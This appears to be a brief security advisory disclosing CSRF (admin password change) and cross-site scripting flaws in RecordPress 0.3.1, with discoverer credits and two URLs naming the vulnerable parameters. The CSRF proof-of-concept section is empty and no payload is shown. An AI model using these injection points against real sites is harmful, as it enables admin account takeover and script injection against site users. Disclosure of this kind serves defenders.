---------------------------------------------------------------- WebApplication : RecordPress 0.3.1 Type of vunlnerability : CSRF ( Change Admin Password ) And XSS Risk of use : Medium ---------------------------------------------------------------- Producer Website : http://www.recordpress.org/ ---------------------------------------------------------------- Discovered by : Khashayar Fereidani Team Website : http://IRCRASH.COM Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim English Forums : Http://IRCRASH.COM/forums/ Email : irancrash [ a t ] gmail [ d o t ] com Facebook : http://facebook.com/fereidani ---------------------------------------------------------------- CSRF For Change Admin Password : ------------------------------------------------ Cross Site Scripting Vulnerabilities : http://examplesite/header.php?row[titledesc]= http://examplesite/admin/rp-menu.php?_SESSION[sess_user]=